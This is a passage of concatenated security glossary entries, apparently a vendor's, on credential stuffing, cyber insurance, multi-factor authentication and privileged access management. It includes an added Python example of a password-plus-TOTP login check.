- Availability of stolen credentials: The abundance of stolen credentials available on the dark web and other illicit platforms makes it easier for attackers to conduct credential stuffing attacks with a large pool of compromised accounts.
- Variation in passwords: Password spray attacks rely on a small set of passwords that are commonly used or easily guessable. In contrast, credential stuffing attacks leverage stolen passwords that can be more diverse and unique, making it harder to identify the attack based on a particular password being sprayed.

### How to Detect and Prevent Credential Stuffing Attacks

One of the most important steps in protecting against credential stuffing attacks is to be able to detect them. There are several signs that can indicate a potential attack, including an increase in failed login attempts, unusual activity on user accounts, and unexpected changes to account information. It's important for individuals and organizations to monitor their accounts regularly and report any suspicious activity immediately.

Preventing credential stuffing attacks requires a multi-layered approach. One effective method is to implement two-factor authentication (2FA), which adds an extra layer of security by requiring users to provide a...

---

- Published: 2023-02-23
- Modified: 2025-08-21
- URL: https://www.silverfort.com/glossary/cyber-insurance/

Insurance designed to protect individuals or organizations from financial and operational losses caused by cyber events, such as data breaches or attacks, through first-party and third-party coverage.

Cyber insurance, also called cyber liability insurance or cyber risk insurance, is a type of insurance meant to protect people and businesses from financial losses and damages caused by cyber-related events. It gives financial help and support in case of cyber attacks, data breaches, and other cyber events that could compromise private information, stop business operations, or cause financial harm.
### What is the importance of cyber insurance in the digital age?

In the digital age, when businesses depend heavily on technology and cyber threats are getting more complex, cyber insurance offers crucial financial and operational safeguards against cyber risks. Here are some of the main reasons cyber insurance matters in today's digital world:

- Financial protection against cyber-related losses.
- Risk transfer to minimize the financial burden on organizations.
- Incident response support from experts in managing cyber incidents.
- Business continuity coverage during disruptions caused by cyber attacks.
- Assistance with legal and regulatory compliance.
- Encouragement of risk management practices and prevention efforts.
- Management of cyber risks in vendor and supply chain relationships.
- Peace of mind by providing a safety net against evolving cyber threats.

### What does cyber insurance cover?

Cyber insurance policies vary widely in terms of the types of coverage offered, the limits of liability, and the exclusions and conditions. These policies are designed to address the unique risks and financial implications of cyber incidents, and they typically offer coverage in two main areas: first-party and third-party.

#### First-Party Coverage

First-party coverage focuses on protecting the insured organization's own losses and expenses incurred as a result of a cyber incident. The following elements are commonly included in first-party coverage:

- Data Breach Response and Investigation: This coverage assists with the costs associated with incident response, including forensic investigations, notifying affected individuals, providing credit monitoring services, and implementing measures to mitigate further damage.
- Business Interruption and Income Loss: In the event of a cyber attack that disrupts business operations, this coverage provides financial assistance to help recover lost revenue and cover ongoing expenses during the downtime.
- Extortion and Ransomware Payments: First-party coverage may include coverage for extortion payments or expenses related to responding to ransom demands, providing financial support to resolve such situations.
- Public Relations and Crisis Management: To manage reputational damage resulting from a cyber incident, this coverage assists with public relations efforts, crisis communication, and the associated expenses.
- Legal Expenses: Cyber insurance policies often cover legal fees and expenses incurred in response to a cyber incident, including regulatory investigations, lawsuits, and any necessary legal representation.

#### Third-Party Coverage

Third-party coverage provides protection against claims and legal actions brought by third parties affected by a cyber incident. It includes the following components:

- Liability for Data Breaches: This coverage addresses legal expenses and damages resulting from the unauthorized access, theft, or release of sensitive data. It assists in defending against claims and potential liabilities arising from data breaches.
- Legal Defense Costs: In the event of a lawsuit or legal action related to a cyber incident, this coverage helps cover the expenses associated with legal defense, including attorney fees, court costs, and settlements.
- Settlements and Judgments: Should the insured organization be found liable for damages, this coverage provides financial compensation for settlements and judgments resulting from third-party claims.

### Cyber Insurance Policy Types

When it comes to cyber insurance, there are primarily two types of policy options available to individuals and businesses: standalone cyber insurance policies and cyber endorsements to existing insurance policies.

#### Standalone Cyber Insurance Policies

Standalone cyber insurance policies are specifically designed to provide comprehensive coverage for cyber risks and incidents. These policies are independent and separate from other insurance policies an organization may have.
They typically offer a wide range of coverage options tailored specifically to cyber risks and provide more comprehensive protection. Standalone policies may include both first-party and third-party coverages, as well as additional enhancements and specialized services.

By opting for a standalone cyber insurance policy, organizations can obtain dedicated coverage that is specifically designed to address the unique challenges and financial consequences associated with cyber incidents. These policies often offer more flexibility and customization options to meet specific needs.

#### Cyber Endorsements to Existing Insurance Policies

Cyber endorsements, also known as cyber liability endorsements or riders, are add-ons or modifications to existing insurance policies. These endorsements expand the coverage of traditional insurance policies to include cyber-related risks and incidents. Commonly, endorsements are added to general liability, property, or professional liability insurance policies.

By adding a cyber endorsement to an existing policy, organizations can enhance their coverage and protect against cyber risks without purchasing a separate standalone policy. However, it's important to note that cyber endorsements may offer more limited coverage compared to standalone policies, as they are typically designed to supplement existing coverage rather than provide comprehensive protection for all cyber risks.

The decision to choose between standalone cyber insurance policies and cyber endorsements depends on various factors, including the organization's risk profile, budget, existing insurance coverage, and specific needs. It's recommended to consult with insurance professionals and assess the coverage options available to determine the most suitable approach for comprehensive cyber risk management.

### What are the requirements for cyber insurance?
The requirements for cyber insurance can vary depending on the insurance provider, policy type, and the specific needs of the insured organization. However, there are common factors and considerations that may be required or recommended when obtaining cyber insurance. Here are some typical requirements to be aware of:

- Cybersecurity Controls: Insurance providers often expect organizations to have adequate cybersecurity controls in place. This may include implementing industry best practices such as multi-factor authentication, firewalls, intrusion detection systems, encryption, regular software updates, and employee awareness training. Demonstrating a commitment to strong cybersecurity practices can help secure favorable coverage terms and premiums.
- Risk Assessment: Insurance providers may require organizations to conduct a thorough risk assessment of their cybersecurity posture. This assessment helps identify vulnerabilities, evaluate potential threats, and determine the level of risk exposure. It may involve analyzing existing security measures, network infrastructure, data handling practices, and incident response capabilities.
- Incident Response Plan: Organizations are often encouraged to have a well-documented incident response plan. This plan outlines the steps to be taken in the event of a cyber incident, including incident reporting, containment, investigation, and recovery procedures. Insurance providers may review and assess the effectiveness of the incident response plan as part of the underwriting process.
- Data Security and Privacy Policies: Insurance applications may require organizations to provide details about their data security and privacy policies. This includes information on data protection measures, access controls, data retention policies, and compliance with relevant regulations such as the General Data Protection Regulation (GDPR) or industry-specific requirements.
- Documentation and Compliance: Insurance providers may require organizations to provide documentation and evidence of their cybersecurity practices and compliance with applicable regulations. This may include records of security audits, penetration testing results, compliance certifications, and any prior incidents and their resolutions.
- Risk Management and Training Programs: Organizations may be expected to have risk management programs in place to mitigate cyber risks effectively. This includes regular training and awareness programs for employees to promote good cybersecurity practices and reduce human error vulnerabilities.

### What is the average cost of cyber insurance?

The average cost of cyber insurance in the U.S. is approximately $1,485 per year, with variations depending on policy limits and specific risks. Small business customers of Insureon, for instance, pay an average of $145 monthly, although this can vary greatly. It's important to note that despite the rise in ransomware activity, the overall pricing of cyber insurance decreased by 9% in 2023.

### What types of businesses need cyber insurance?

Generally, any business that stores private information online or on electronic devices requires cyber insurance. This encompasses a diverse range of business types, from retailers and restaurants to consultants and real estate agents.

### What industries require cyber insurance?

While all industries should incorporate cyber liability into their insurance programs due to the increasing prevalence of cyber threats, certain industries have a particularly high need for such coverage. Industries dealing with significant amounts of sensitive data, such as healthcare, finance, and retail, are particularly in need of cyber insurance.

### Cyber Insurance Claims Process

In the face of a cyber incident, having cyber insurance coverage can provide much-needed support.
Understanding the cyber insurance claims process is crucial for organizations to effectively navigate the complexities of filing a claim and receiving the necessary financial assistance. Filing a Cyber Insurance Claim: Incident Identification and Notification: Report the incident to your insurer promptly, following their procedures. Initial Communication and Documentation: Provide essential details about the incident and any immediate actions taken. Documentation and Evidence: Gather supporting evidence such as incident reports, breach notifications, financial records, and legal correspondence. Claim Submission: Submit a comprehensive claim form with accurate details of financial losses and expenses incurred. Understanding Cyber Risks Cyber risks refer to potential harm or damage resulting from malicious activities in the digital realm. These risks encompass a wide range of threats, including data breaches, ransomware attacks, phishing attempts, malware infections, and more. The impact of cyber risks can be devastating, affecting individuals, businesses, and even national security. Cyber attacks can lead to financial losses, reputational damage, intellectual property theft, privacy breaches, and disruptions to critical infrastructures. Examples of Cyber Threats To comprehend the gravity of cyber risks, it is crucial to examine real-world examples of prevalent cyber threats. Data breaches, where unauthorized parties gain access to sensitive information, are a significant concern. Recent incidents, such as the Equifax data breach or the Marriott International security breach, exposed millions of individuals' personal data and highlighted the far-reaching consequences of such attacks. Ransomware attacks, another pervasive threat, involve encrypting systems and demanding a ransom for their release. Notable cases include the WannaCry and NotPetya attacks, which wreaked havoc on organizations worldwide. 
What is the scope of the Cyber Insurance threat and its financial consequences? A report by IBM Security and the Ponemon Institute estimated the average cost of a data breach to be $3.86 million in 2020. This includes expenses related to incident response, investigation, recovery, regulatory fines, legal actions, customer notification, and reputational damage. As the rate of ransomware attacks soars – up 71% in the past year and fueled by billions of stolen credentials available on the dark web – threat actors increasingly make use of lateral movement to successfully spread payloads across an entire environment at once. Major companies, including Apple, Accenture, Nvidia, Uber, Toyota, and Colonial Pipeline, have all been victims of recent high-profile attacks resulting from blind spots in identity protection. This is why underwriters have put stringent measures in place that companies must meet before being eligible for a policy. Is multi-factor authentication (MFA) a requirement for cyber insurance? The requirement for multi-factor authentication (MFA) in cyber insurance policies can vary depending on the insurance provider and the specific policy terms. That being said, many insurance providers strongly recommend or encourage the implementation of MFA as part of cybersecurity compliance measures. MFA adds an extra layer of protection by requiring users to provide multiple forms of verification, such as a password and a unique code sent to a mobile device, to access systems or sensitive information. By implementing MFA, organizations can significantly reduce the risk of unauthorized access and protect against credential-based attacks. How do cyber insurers’ requirements for MFA reduce ransomware risk? In the context of ransomware attacks, MFA can help mitigate the risk in several ways: Stronger authentication: Ransomware attacks often succeed due to compromised credentials. Attackers gain access to a system or network by using stolen or weak passwords. 
By enforcing MFA, even if an attacker manages to obtain or guess a password, they would still need the additional factor (e.g., a physical device or biometric data) to gain access. This additional layer of authentication makes it much harder for attackers to proceed with lateral movement. Preventing unauthorized access: With MFA, even if an attacker gains... --- - Published: 2023-01-25 - Modified: 2025-08-21 - URL: https://www.silverfort.com/glossary/multi-factor-authentication-mfa/ A security measure requiring two or more distinct forms of identity verification—such as a password plus a token or biometric—for user authentication. Multi-Factor Authentication (MFA) is a security mechanism that provides an additional layer of protection beyond traditional username-password authentication. It requires users to provide multiple forms of identification or evidence to verify their identity before granting access to a system, device, or application. MFA is designed to address the limitations and vulnerabilities associated with single-factor authentication, where a username and password combination is the only requirement for access. By incorporating multiple authentication factors, MFA significantly enhances security and reduces the risk of unauthorized access, data breaches, and identity theft. Why MFA is important: The need for enhanced security measures The need for MFA arises from the fact that credentials alone no longer suffice as a trusted identifier of legitimate users. In recent years we’ve witnessed a sharp increase in the volume of attacks that use compromised user credentials to access target resources. According to Microsoft, MFA is 99.9% effective in preventing such identity-based attacks. This is because even if a user’s credentials get compromised, MFA makes it incredibly difficult for attackers to pass the authentication requirements. 
Understanding Authentication In the digital age, authentication is a critical process that verifies the identity of users and ensures the security of sensitive information. It serves as a gatekeeper, granting access only to authorized individuals. There are two primary authentication methods: Single-Factor Authentication (SFA) and Multi-Factor Authentication (MFA). Single-Factor Authentication Single-Factor Authentication relies on a single method of verifying identity. It typically involves the use of a username and password combination. Users provide their credentials, and if they match the stored information, access is granted. Examples of SFA include logging into an email account or accessing a social media profile. However, SFA has inherent limitations and vulnerabilities. Passwords can be weak, easily guessable, or susceptible to brute-force attacks. Users often reuse passwords across multiple accounts, amplifying the risks. Additionally, passwords can be stolen through phishing attacks or keyloggers. Once an attacker gains access to the password, they can impersonate the user and potentially cause significant harm. Multi-Factor Authentication (MFA) To address the weaknesses of SFA, Multi-Factor Authentication (MFA) was introduced. MFA requires users to provide multiple forms of identification or evidence to verify their identity. It adds an extra layer of security beyond the traditional username-password combination by combining two or more authentication factors. These factors fall into different categories: knowledge, possession, inherence, and location. By requiring multiple factors, MFA significantly enhances security and makes it more challenging for attackers to gain unauthorized access. MFA greatly improves security by reducing the risks associated with stolen passwords and credential theft. Even if an attacker manages to obtain a user's password, they would still need to bypass additional factors to authenticate successfully. 
This multi-layered approach significantly mitigates the chances of unauthorized access, protecting sensitive data and resources. What's the difference between MFA and Two-Factor Authentication (2FA)? Two-Factor Authentication (2FA) is a specific type of Multi-Factor Authentication (MFA). While both aim to enhance security beyond username-password authentication, there is a slight difference between them. 2FA requires users to provide two distinct factors to verify their identity. Typically, this involves combining something the user knows (password) with something they possess (physical token or OTP on a mobile device). MFA, on the other hand, is a broader term that includes the use of more than two factors. In addition to knowledge and possession factors, MFA can incorporate factors like biometrics (fingerprint, facial recognition) or location-based verification. In essence, 2FA is a subset of MFA, with MFA offering the flexibility to include multiple factors beyond the two commonly used ones. How does MFA work? Multi-factor Authentication (MFA) works by requiring users to provide multiple forms of identification or evidence to verify their identity. It's important to note that the specific steps and factors involved in MFA can vary depending on the system or service being used but here's a concise overview of how MFA typically works: User Initiation: The user initiates the authentication process by providing their username or identifier. First Factor: The first factor, often a knowledge factor, is requested. This can be a password, PIN, or answers to security questions. The user enters the required information. Verification: The system verifies the first factor by comparing the provided information with the stored credentials associated with the user's account. Second Factor: After successful verification of the first factor, the system prompts the user to provide the second factor. 
This can be a possession factor, such as a one-time password (OTP) generated by a mobile app or a physical token, or an inherence factor like a fingerprint or facial scan. Verification and Authentication: The system verifies the second factor by validating the OTP, scanning the biometric data (with a fingerprint scan or retinal scan), or confirming possession of the physical token. If the second factor is successfully verified, the user's identity is authenticated, and access is granted to the desired system, device, or application. Optional Additional Factors: Depending on the implementation, MFA may include additional factors, such as a location factor where the system verifies the user's IP address or geolocation, or behavioral factors that analyze user patterns and context for further validation. What are the factors of authentication in MFA? Multi-Factor Authentication (MFA) is a powerful security measure that combines multiple factors to verify user identity. These factors fall into different categories, each providing a unique layer of protection. These factors include: A. Knowledge Factor (Something You Know) The knowledge factor involves something the user knows, such as passwords, personal identification numbers (PINs) or security questions. Passwords have long been used as the primary form of authentication. However, they come with their own set of challenges and vulnerabilities. Weak passwords, password reuse, and easily guessable combinations pose significant risks. It is essential to follow password best practices, such as using strong and unique passwords, regularly updating them, and avoiding common words or patterns. Educating users about the importance of password security is crucial to mitigate vulnerabilities associated with the knowledge factor. B. Possession Factor (Something You Have) The possession factor relies on something the user possesses. 
This can include physical tokens, smart cards, email or SMS verification codes, or mobile authentication apps. Physical tokens are small devices that generate one-time passwords (OTPs) or digital signatures, adding an extra layer of security. Smart cards, on the other hand, store authentication credentials securely. A mobile authenticator app leverages the ubiquity of smartphones, turning them into authentication devices. These apps generate time-based OTPs or use push notifications to verify user identity. The possession factor ensures that only individuals with the authorized physical or digital possession can authenticate successfully. C. Inherence Factor (Something You Are) The inherence factor is based on unique biological or behavioral traits of individuals. Biometric factors, such as fingerprints, facial recognition, voice recognition, or iris scanning, fall under this category. Biometrics offer advantages in terms of convenience, as users don't need to remember passwords or carry physical tokens. They provide a highly personalized and secure method of authentication. However, biometrics also have limitations. Biometric data can be subject to false positives or false negatives, and it can raise privacy concerns. The implementation of biometric authentication should address these considerations to ensure effectiveness and user acceptance. D. Location Factor (Somewhere You Are) The location factor takes into account the user's physical location or context. Geo-location and IP address verification are commonly used to validate user identity. By checking the user's location against authorized regions, suspicious activities from unfamiliar locations can be flagged. IP address verification adds an additional layer of security by matching the user's IP address against known trusted IP ranges. 
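The two-step flow described under "How does MFA work?" above, combined with a possession factor (an RFC 6238 time-based one-time password) and the trusted-IP-range location check just described, as an added example in Python that is not part of the original Silverfort page. The user record, password, base32 secret and IP ranges are constructed sample data, and the verifier accepts one 30-second step of clock drift on either side.

```python
"""Two-step MFA decision flow: knowledge factor (password), possession factor
(RFC 6238 TOTP) and a location check against trusted IP ranges.

Added illustration, not Silverfort's or any vendor's code. The user record,
the base32 secret, the password and the trusted IP ranges below are all
constructed sample data.
"""
import base64
import hashlib
import hmac
import ipaddress
import struct
import time

PBKDF2_ROUNDS = 200_000
STEP_SECONDS = 30  # RFC 6238 default time step


def hash_password(password: str, salt: bytes) -> bytes:
    """Knowledge factor at rest: store only a salted PBKDF2 hash, never the password."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)


# Constructed user store. In practice the TOTP secret is provisioned to the
# user's authenticator app at enrolment (typically via a QR code).
_SALT = b"constructed-static-salt-16b"
USERS = {
    "alice": {
        "pw_hash": hash_password("correct horse battery staple", _SALT),
        "salt": _SALT,
        "totp_secret": base64.b32decode("JBSWY3DPEHPK3PXP"),  # constructed sample
    }
}
# Constructed trusted ranges (RFC 1918 space plus a documentation prefix).
TRUSTED_RANGES = [ipaddress.ip_network("10.0.0.0/8"),
                  ipaddress.ip_network("203.0.113.0/24")]


def verify_first_factor(username: str, password: str) -> bool:
    """Steps 1-3 of the flow: identifier, knowledge factor, constant-time comparison."""
    user = USERS.get(username)
    if user is None:
        # Run the KDF anyway so an unknown username is not distinguishable by timing.
        hash_password(password, _SALT)
        return False
    return hmac.compare_digest(hash_password(password, user["salt"]), user["pw_hash"])


def totp(secret: bytes, timestamp: int, digits: int = 6, step: int = STEP_SECONDS) -> str:
    """RFC 6238 TOTP: HOTP (RFC 4226, HMAC-SHA1) over the counter floor(timestamp / step)."""
    counter = struct.pack(">Q", timestamp // step)
    mac = hmac.new(secret, counter, hashlib.sha1).digest()
    offset = mac[-1] & 0x0F                                   # dynamic truncation
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % (10 ** digits)).zfill(digits)


def verify_second_factor(secret: bytes, code: str, now: int, window: int = 1) -> bool:
    """Possession factor: accept the current step and +/- `window` steps of clock drift.

    A production verifier should also remember the last accepted counter so the
    same code cannot be replayed inside the drift window.
    """
    for drift in range(-window, window + 1):
        candidate = totp(secret, now + drift * STEP_SECONDS)
        if hmac.compare_digest(candidate.encode(), code.encode()):
            return True
    return False


def location_trusted(source_ip: str) -> bool:
    """Location factor: does the source address fall inside a known trusted range?"""
    addr = ipaddress.ip_address(source_ip)
    return any(addr in net for net in TRUSTED_RANGES)


def authenticate(username: str, password: str, code: str, source_ip: str, now=None):
    """Return (granted, reason), checking factors in the order the text describes."""
    now = int(time.time()) if now is None else now
    if not verify_first_factor(username, password):
        return False, "first factor rejected"
    if not verify_second_factor(USERS[username]["totp_secret"], code, now):
        return False, "second factor rejected"
    if not location_trusted(source_ip):
        return False, "source location not trusted"
    return True, "authenticated"
```

The reason string is deliberately the same granularity a login audit log would record; the user-facing message should not reveal which factor failed.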
Contextual authentication is another approach where factors such as time of login, device type, or user behavior patterns are considered to assess the legitimacy of the authentication request. These location-based factors provide added assurance and protection against unauthorized access. Benefits and Challenges of Multi-Factor Authentication Multi-Factor Authentication (MFA) offers numerous benefits but also comes with its own set of challenges. Benefits of MFA Increased security: MFA significantly enhances security by adding an extra layer of protection beyond passwords. It reduces the risk of unauthorized access and strengthens defense against various attacks. Mitigation of password-related risks: MFA reduces reliance on passwords, which are susceptible to weaknesses like weak passwords, password reuse, and phishing attacks. By incorporating additional factors, MFA mitigates the risks associated with password-related vulnerabilities. Compliance with industry regulations: MFA helps organizations meet regulatory requirements and industry standards related to data protection and security. Implementing MFA ensures compliance with guidelines and regulations set by regulatory bodies. Challenges of MFA User adoption and resistance: MFA can face resistance from users who find it inconvenient or unfamiliar. Some users may resist the additional steps or find the learning curve challenging. Proper education and user awareness programs can help address these challenges. Potential usability issues: MFA implementations may introduce usability issues, particularly if not designed with a user-friendly approach. Complicated processes or technical difficulties can frustrate users and hinder adoption. User experience should be carefully considered to minimize usability challenges. Cost considerations: Implementing MFA may involve initial investment and ongoing costs. 
Organizations must consider factors such as the cost of hardware tokens, software licenses, or maintenance and support. Cost-effectiveness and the long-term benefits should be evaluated. Can Multi-Factor Authentication be hacked? While Multi-Factor Authentication (MFA) significantly enhances security, it is not entirely immune to hacking or exploitation. Although MFA adds additional layers of protection, determined attackers may still find ways to compromise it through various methods. Here are a few considerations regarding the potential hacking of MFA: Social Engineering: Attackers may attempt to deceive or manipulate users to disclose their authentication factors, such as tricking them into revealing their passwords or providing access to their physical tokens or mobile devices. Social engineering attacks exploit human vulnerabilities rather than directly targeting the MFA system itself. Phishing Attacks: Phishing attacks aim to trick users into visiting fake websites or clicking on malicious links to collect their authentication credentials. Even with MFA in place, if users unknowingly provide their factors to fraudulent websites, attackers can still gain access to their accounts. Malware and Keyloggers: Malicious software or keyloggers can capture keystrokes or screen activity, potentially capturing passwords or one-time codes generated by MFA devices or applications. This information can be used by attackers to bypass MFA. SIM Swapping: In cases where MFA relies on text messages or voice calls for delivering authentication codes, attackers can attempt to fraudulently transfer a victim's phone number to a device under their control. This allows them to intercept authentication codes sent via SMS or voice calls. Biometric Spoofing: Biometric factors, such as fingerprints or facial recognition, can be susceptible to spoofing attacks using advanced techniques like synthetic fingerprints or 3D models of faces. 
These attacks can potentially bypass biometric-based MFA systems. While the above methods pose potential risks, implementing MFA still significantly improves security and makes it much more challenging for attackers to compromise accounts compared to single-factor authentication. MFA remains an effective security measure and is widely recommended as a best practice to protect against unauthorized access. To mitigate the risk of MFA hacking, it is crucial to stay vigilant, educate users about potential threats, and adopt additional security measures such as regular software updates, robust anti-malware solutions, and user awareness training on phishing and social engineering attacks. Organizations should also continuously monitor and enhance their MFA systems to stay ahead of evolving threats. Implementing Multi-Factor Authentication Multi-Factor Authentication (MFA) is a powerful security measure that enhances protection against unauthorized access. When implementing MFA, several considerations need to be taken into account, including user experience, compatibility, scalability, and maintenance. Additionally, there are various types of MFA solutions available. Let's explore these aspects in detail: Considerations for MFA Implementation User Experience and Convenience: One of the key considerations when implementing MFA is ensuring a positive user experience. MFA should strike a balance between security and usability to encourage user adoption. The authentication process should be intuitive, streamlined, and not overly burdensome for users. Ensuring convenience through factors like... --- - Published: 2023-01-25 - Modified: 2025-08-21 - URL: https://www.silverfort.com/glossary/privileged-access-management-pam/ Technologies and policies that manage and monitor elevated-level user access (e.g., administrators), enforcing strict controls and reducing security risk. 
Privileged Access Management (PAM) consists of a set of strategies, technologies, and processes designed to control and manage privileged access to an organization's networks, systems, and data. The role of Privileged Access Management (PAM) in protecting organizations against unauthorized access and security breaches is crucial. Typically, privileged access refers to the elevated level of privileges granted to certain users or accounts within an IT infrastructure. Privileged accounts have extensive control over critical resources and are capable of performing tasks that are not available to regular user accounts. To prevent unauthorized individuals from exploiting these powerful privileges and compromising an organization's security, privileged access must be managed and secured. What Are Privileges and How Are They Created? In the context of cybersecurity, privileges refer to the specific permissions assigned to users or accounts within an IT system. These privileges determine the actions and operations that a user or account can perform within a network, application, or system. Privileges are created and assigned based on the principle of least privilege (PoLP), which advocates granting users or accounts only the minimum privileges necessary to carry out their designated tasks. This principle helps limit potential security risks by reducing the attack surface and minimizing the potential impact of compromised accounts by limiting the number of users with administrative access. Privileges can be categorized into different levels, such as: User-level privileges: These privileges are associated with regular user accounts and generally include basic permissions required for day-to-day tasks. User-level privileges allow users to access files, execute applications, and perform routine operations. 
Administrative privileges: Also known as superuser or administrator privileges, these are higher-level permissions granted to individuals responsible for managing systems, networks, and applications. Admin privileges enable users to configure settings, install software, modify system configurations, and perform other critical tasks necessary for system administration. The creation and assignment of privileges typically involve the role-based access control (RBAC) approach. RBAC allows administrators to define roles and associate sets of privileges with each role. Users or accounts are then assigned specific roles based on their responsibilities within the organization. This centralized approach streamlines privilege management and ensures consistent access control across the IT infrastructure. It is important to regularly review and update privileges to align with organizational needs and security requirements. Properly managing privileges is a fundamental aspect of maintaining a robust security posture and preventing unauthorized access and misuse of critical resources. What are Privileged Accounts? Privileged accounts, also referred to as administrative accounts or privileged users, are user accounts with elevated privileges beyond those of regular user accounts. These accounts are typically reserved for system administrators, IT personnel, or other individuals who require extensive control over IT resources. Privileged accounts have broad access rights and permissions that enable them to perform critical actions within an IT infrastructure. They possess the authority to configure system settings, install software, access sensitive data, and perform other administrative tasks necessary for managing and maintaining the organization's IT environment. However, the extensive privileges associated with privileged accounts also make them attractive targets for cybercriminals. 
If compromised, these accounts can provide attackers with unrestricted access to sensitive data, systems, and network resources, leading to severe security breaches and potential damage. To mitigate the risks associated with privileged accounts, organizations need to implement robust security measures, such as privileged access management (PAM) solutions. PAM solutions facilitate the secure management and monitoring of privileged accounts, ensuring that access is granted on a need-to-know basis and that all activities are logged and audited. Effective management of privileged accounts involves practices such as: Access control: Implementing strict controls to restrict and monitor access to privileged accounts. This includes the use of strong passwords, multi-factor authentication, and session management. Privilege elevation: Utilizing techniques to grant temporary elevated privileges to regular user accounts only when necessary, reducing the exposure of privileged credentials. Privilege separation: Separating administrative tasks and segregating duties to minimize the risk of abuse or unauthorized access. This involves assigning different privileges to different roles and individuals, preventing a single point of compromise. What are Privileged Credentials? Privileged credentials refer to the authentication credentials associated with privileged accounts, allowing users to prove their identity and gain access to elevated privileges. These credentials typically include usernames, passwords, and, in some cases, additional factors like security tokens or biometric data. The security of privileged credentials is of paramount importance in maintaining a secure IT environment. If unauthorized individuals obtain these credentials, they can impersonate privileged users and gain unrestricted access to critical systems and sensitive data. 
To protect privileged credentials, organizations should adopt strong security measures, such as: Password management: Implementing secure password policies, including the use of complex passwords, regular password rotation, and avoiding password reuse. Additionally, organizations can enhance password security through the use of password vaults and password management solutions. Multi-factor authentication (MFA): Enforcing the use of multiple factors to authenticate privileged users, such as combining passwords with biometric verification, security tokens, or one-time passcodes. MFA adds an extra layer of security, making it significantly harder for unauthorized individuals to gain access to privileged accounts. Credential vaulting: Storing privileged credentials in secure and encrypted vaults, protecting them from unauthorized access and ensuring that they are only accessible to authorized personnel. Privileged session monitoring: Implementing real-time monitoring of privileged sessions to detect any suspicious activities or potential security breaches. This helps in identifying unauthorized access attempts or abnormal behavior by privileged users. How do you identify privileged users? Identifying privileged users is an important step in managing and securing privileged access. Some methods to identify privileged users include: Role-based identification: Privileged users can be identified based on their role in the organization, such as system administrators, IT personnel, database administrators, and others who require elevated privileges to perform their job duties. Permission-based identification: Users who have access to systems, applications, or information that require elevated privileges can be considered privileged users. This information can be obtained from access control lists or other access management systems. 
Activity-based identification: User activity can be monitored and analyzed to identify users who regularly perform actions that require elevated privileges. For example, if a user frequently accesses sensitive information or makes changes to system configurations, they may be considered a privileged user. Risk-based identification: Users who pose a high risk to an organization’s systems and information can be identified through a risk assessment. For example, users who have access to critical systems or sensitive information, or those who have a history of security incidents, may be considered privileged users. Privileged Access Management vs Privileged Identity Management PAM focuses on managing and controlling privileged access to systems, networks, and resources within an organization's IT infrastructure. It aims to ensure that privileged accounts, which have elevated permissions and access rights, are properly secured, monitored, and audited. PIM, on the other hand, is a subset of PAM that specifically focuses on managing and securing privileged identities. It deals with the lifecycle management of privileged accounts, including their creation, provisioning, deprovisioning, and entitlements. Why PAM is Important Privileged Access Management is important because it helps organizations protect against insider threats, mitigate external attacks, comply with regulatory requirements, minimize the attack surface, enhance visibility and accountability, and safeguard critical assets. By implementing effective PAM strategies, organizations can strengthen their overall security posture and mitigate the risks associated with privileged access, ultimately ensuring the confidentiality, integrity, and availability of their systems and data. Protection against insider threats: Insider threats can pose a significant risk to organizations. Privileged accounts, if compromised or misused by insiders, can result in severe damage, data breaches, or unauthorized modifications. 
PAM solutions provide granular control and monitoring capabilities, ensuring that privileged access is limited to authorized personnel and any suspicious activities are promptly detected and addressed. Mitigation of external attacks: Cybercriminals are constantly evolving their tactics to gain unauthorized access to sensitive systems and data. Privileged accounts are attractive targets for hackers, as compromising them can provide unrestricted access and control. PAM helps safeguard against external attacks by implementing strong access controls, multi-factor authentication, and continuous monitoring, making it significantly harder for attackers to exploit privileged accounts. Compliance and regulatory requirements: Many industries are subject to stringent regulatory requirements, such as the Payment Card Industry Data Security Standard (PCI DSS), Health Insurance Portability and Accountability Act (HIPAA), or General Data Protection Regulation (GDPR). These regulations often mandate the implementation of controls over privileged access to protect sensitive data. PAM solutions help organizations meet these compliance requirements by enforcing access controls, maintaining audit trails, and demonstrating accountability. Minimization of the attack surface: Privileged accounts often have broad access rights, providing a potential entry point for attackers. By implementing PAM, organizations can enforce the principle of least privilege, ensuring that users or accounts only have the necessary privileges to perform their specific tasks. This reduces the attack surface, limiting the potential impact of compromised accounts and minimizing the overall risk to the organization. Enhanced visibility and accountability: PAM solutions offer comprehensive visibility into privileged account activities, including user sessions, commands executed, and changes made. 
This visibility enables organizations to monitor and audit privileged access, identifying any suspicious behavior, policy violations, or potential security incidents. Additionally, PAM helps establish accountability by attributing actions to specific privileged users, facilitating forensic investigations and incident response. Safeguarding critical assets and intellectual property: Privileged accounts often have access to an organization's most critical assets, such as intellectual property, financial data, or sensitive customer information. Unauthorized access or misuse of these accounts can lead to significant financial losses, reputational damage, and legal consequences. PAM solutions protect these valuable assets by tightly controlling and monitoring privileged access, ensuring that only authorized individuals can interact with sensitive resources. Benefits of Privileged Access Management Privileged Access Management (PAM) offers several benefits, including enhanced security through access controls and monitoring, improved compliance with industry regulations, reduced insider threats by implementing strict controls and accountability measures, and streamlined operations through automation and centralized management. Enhanced Security: Implementing PAM solutions significantly enhances security by providing robust controls and measures to protect privileged accounts. PAM helps enforce the principle of least privilege, ensuring that users have only the necessary access rights. It includes features such as strong authentication, multi-factor authentication, session monitoring, and access segregation to prevent unauthorized access and detect suspicious activities. By implementing PAM, organizations can effectively mitigate the risks associated with compromised privileged accounts and unauthorized access attempts, thereby strengthening their overall security posture. 
- Improved Compliance: Compliance with industry regulations and standards is a critical requirement for organizations in various sectors. PAM solutions help meet these compliance obligations by enforcing access controls, maintaining audit trails, and demonstrating accountability. By implementing PAM, organizations can demonstrate that the necessary controls and measures are in place to protect sensitive data, thereby meeting the requirements of regulations such as PCI DSS, HIPAA, GDPR, and others. Compliance with these standards not only avoids penalties but also instills confidence in customers and business partners.
- Reduction of Insider Threats: Insider threats, which can come from employees, contractors, or business partners, pose a significant risk to organizations. PAM solutions mitigate these risks by implementing strict controls, monitoring, and accountability measures for privileged accounts. By limiting privileges to only those necessary for job functions and implementing session monitoring, organizations can detect and prevent unauthorized or malicious activities by insiders. PAM solutions provide a comprehensive view of privileged account activities, enabling quick detection of any suspicious behavior or policy violations, thereby reducing the potential impact of insider threats.
